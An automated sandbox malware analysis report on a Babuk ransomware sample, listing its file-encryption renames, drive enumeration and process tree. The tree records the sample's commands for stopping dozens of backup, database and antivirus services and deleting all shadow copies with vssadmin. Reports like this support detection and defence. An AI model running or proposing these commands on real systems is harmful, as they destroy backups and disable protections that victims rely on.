Malware Analysis Report

2024-10-16 03:24

Sample ID 210420-vvh2sqr4dx
Target ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe
SHA256 ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76
Tags: babuk ransomware

Score: 10/10


Analysis Overview

Score: 10/10

SHA256: ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76

Threat Level: Known bad

The file ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe was found to be: Known bad.

Malicious Activity Summary

babuk ransomware

Babuk Locker

Deletes shadow copies

Modifies extensions of user files

Enumerates connected drives

Enumerates physical storage devices

Interacts with shadow copies

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2021-04-20 13:37

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2021-04-20 13:37

Reported: 2021-04-20 13:39

Platform: win7v20210410

Max time kernel: 7s

Max time network: 10s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe"

Signatures

Babuk Locker (tags: ransomware, babuk)

Deletes shadow copies (tags: ransomware)

Modifies extensions of user files (tags: ransomware)

Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\NewFind.raw => C:\Users\Admin\Pictures\NewFind.raw.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened for modification C:\Users\Admin\Pictures\NewFind.raw.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File renamed C:\Users\Admin\Pictures\RedoImport.crw => C:\Users\Admin\Pictures\RedoImport.crw.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened for modification C:\Users\Admin\Pictures\RedoImport.crw.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File renamed C:\Users\Admin\Pictures\RenameLimit.tif => C:\Users\Admin\Pictures\RenameLimit.tif.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened for modification C:\Users\Admin\Pictures\RenameLimit.tif.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A

Enumerates physical storage devices

Interacts with shadow copies (tags: ransomware)

Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 768 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 1176 wrote to memory of 1984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1176 wrote to memory of 1984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1176 wrote to memory of 1984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1984 wrote to memory of 1848 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1984 wrote to memory of 1848 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1984 wrote to memory of 1848 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 768 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 1792 wrote to memory of 1768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1792 wrote to memory of 1768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1792 wrote to memory of 1768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1768 wrote to memory of 1808 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1768 wrote to memory of 1808 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1768 wrote to memory of 1808 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 768 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 1756 wrote to memory of 1384 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1756 wrote to memory of 1384 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1756 wrote to memory of 1384 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1384 wrote to memory of 1240 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1384 wrote to memory of 1240 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1384 wrote to memory of 1240 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 768 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 848 wrote to memory of 1552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 848 wrote to memory of 1552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 848 wrote to memory of 1552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1552 wrote to memory of 1436 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1552 wrote to memory of 1436 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1552 wrote to memory of 1436 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 768 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 1584 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1284 wrote to memory of 1584 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1284 wrote to memory of 1584 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1584 wrote to memory of 300 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1584 wrote to memory of 300 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1584 wrote to memory of 300 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 768 wrote to memory of 292 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 292 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 292 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 292 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 292 wrote to memory of 112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 292 wrote to memory of 112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 292 wrote to memory of 112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 112 wrote to memory of 332 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 112 wrote to memory of 332 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 112 wrote to memory of 332 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 768 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe

"C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe"

C:\Windows\system32\cmd.exe

cmd.exe /c net stop mssqlserver /y

C:\Windows\system32\net.exe

net stop mssqlserver /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop mssqlserver /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop vss /y

C:\Windows\system32\net.exe

net stop vss /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop vss /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop sql /y

C:\Windows\system32\net.exe

net stop sql /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop sql /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop svc$ /y

C:\Windows\system32\net.exe

net stop svc$ /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop svc$ /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop memtas /y

C:\Windows\system32\net.exe

net stop memtas /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop memtas /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop mepocs /y

C:\Windows\system32\net.exe

net stop mepocs /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop mepocs /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop sophos /y

C:\Windows\system32\net.exe

net stop sophos /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop sophos /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop veeam /y

C:\Windows\system32\net.exe

net stop veeam /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop veeam /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop backup /y

C:\Windows\system32\net.exe

net stop backup /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop backup /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop GxVss /y

C:\Windows\system32\net.exe

net stop GxVss /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop GxVss /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop GxBlr /y

C:\Windows\system32\net.exe

net stop GxBlr /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop GxBlr /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop GxFWD /y

C:\Windows\system32\net.exe

net stop GxFWD /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop GxFWD /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop GxCVD /y

C:\Windows\system32\net.exe

net stop GxCVD /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop GxCVD /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop GxCIMgr /y

C:\Windows\system32\net.exe

net stop GxCIMgr /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop GxCIMgr /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop DefWatch /y

C:\Windows\system32\net.exe

net stop DefWatch /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop DefWatch /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop ccEvtMgr /y

C:\Windows\system32\net.exe

net stop ccEvtMgr /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop ccEvtMgr /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop ccSetMgr /y

C:\Windows\system32\net.exe

net stop ccSetMgr /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop ccSetMgr /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop SavRoam /y

C:\Windows\system32\net.exe

net stop SavRoam /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SavRoam /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop RTVscan /y

C:\Windows\system32\net.exe

net stop RTVscan /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop RTVscan /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop QBFCService /y

C:\Windows\system32\net.exe

net stop QBFCService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBFCService /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop QBIDPService /y

C:\Windows\system32\net.exe

net stop QBIDPService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBIDPService /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop Intuit.QuickBooks.FCS /y

C:\Windows\system32\net.exe

net stop Intuit.QuickBooks.FCS /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop QBCFMonitorService /y

C:\Windows\system32\net.exe

net stop QBCFMonitorService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBCFMonitorService /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop YooBackup /y

C:\Windows\system32\net.exe

net stop YooBackup /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop YooBackup /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop YooIT /y

C:\Windows\system32\net.exe

net stop YooIT /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop YooIT /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop zhudongfangyu /y

C:\Windows\system32\net.exe

net stop zhudongfangyu /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop zhudongfangyu /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop sophos /y

C:\Windows\system32\net.exe

net stop sophos /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop sophos /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop stc_raw_agent /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop stc_raw_agent /y

C:\Windows\system32\net.exe

net stop stc_raw_agent /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop VSNAPVSS /y

C:\Windows\system32\net.exe

net stop VSNAPVSS /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VSNAPVSS /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop VeeamTransportSvc /y

C:\Windows\system32\net.exe

net stop VeeamTransportSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamTransportSvc /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop VeeamDeploymentService /y

C:\Windows\system32\net.exe

net stop VeeamDeploymentService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamDeploymentService /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop VeeamNFSSvc /y

C:\Windows\system32\net.exe

net stop VeeamNFSSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamNFSSvc /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop veeam /y

C:\Windows\system32\net.exe

net stop veeam /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop veeam /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop PDVFSService /y

C:\Windows\system32\net.exe

net stop PDVFSService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop PDVFSService /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop BackupExecVSSProvider /y

C:\Windows\system32\net.exe

net stop BackupExecVSSProvider /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecVSSProvider /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop BackupExecAgentAccelerator /y

C:\Windows\system32\net.exe

net stop BackupExecAgentAccelerator /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop BackupExecAgentBrowser /y

C:\Windows\system32\net.exe

net stop BackupExecAgentBrowser /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentBrowser /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop BackupExecDiveciMediaService /y

C:\Windows\system32\net.exe

net stop BackupExecDiveciMediaService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop BackupExecJobEngine /y

C:\Windows\system32\net.exe

net stop BackupExecJobEngine /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecJobEngine /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop BackupExecManagementService /y

C:\Windows\system32\net.exe

net stop BackupExecManagementService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecManagementService /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop BackupExecRPCService /y

C:\Windows\system32\net.exe

net stop BackupExecRPCService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecRPCService /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop AcrSch2Svc /y

C:\Windows\system32\net.exe

net stop AcrSch2Svc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop AcrSch2Svc /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop AcronisAgent /y

C:\Windows\system32\net.exe

net stop AcronisAgent /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop AcronisAgent /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop CASAD2DWebSvc /y

C:\Windows\system32\net.exe

net stop CASAD2DWebSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop CASAD2DWebSvc /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop CAARCUpdateSvc /y

C:\Windows\system32\net.exe

net stop CAARCUpdateSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop CAARCUpdateSvc /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop GoogleChromeElevationService /y

C:\Windows\system32\net.exe

net stop GoogleChromeElevationService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop GoogleChromeElevationService /y

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

Network

N/A

Files


Analysis: behavioral2

Detonation Overview

Submitted: 2021-04-20 13:37

Reported: 2021-04-20 13:39

Platform: win10v20210408

Max time kernel: 87s

Max time network: 111s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe"

Signatures

Babuk Locker (tags: ransomware, babuk)

Deletes shadow copies (tags: ransomware)

Modifies extensions of user files (tags: ransomware)

Description Indicator Process Target
File opened for modification C:\Users\Admin\Pictures\SplitRedo.png.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened for modification C:\Users\Admin\Pictures\CompleteDisconnect.tiff C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened for modification C:\Users\Admin\Pictures\CopyReset.raw.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened for modification C:\Users\Admin\Pictures\MergeUnregister.tiff C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened for modification C:\Users\Admin\Pictures\MergeUnregister.tiff.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File renamed C:\Users\Admin\Pictures\ResolveRegister.tif => C:\Users\Admin\Pictures\ResolveRegister.tif.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File renamed C:\Users\Admin\Pictures\StopEdit.raw => C:\Users\Admin\Pictures\StopEdit.raw.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File renamed C:\Users\Admin\Pictures\SplitRedo.png => C:\Users\Admin\Pictures\SplitRedo.png.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened for modification C:\Users\Admin\Pictures\BlockConvert.png.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File renamed C:\Users\Admin\Pictures\CopyReset.raw => C:\Users\Admin\Pictures\CopyReset.raw.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File renamed C:\Users\Admin\Pictures\RestartEdit.raw => C:\Users\Admin\Pictures\RestartEdit.raw.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
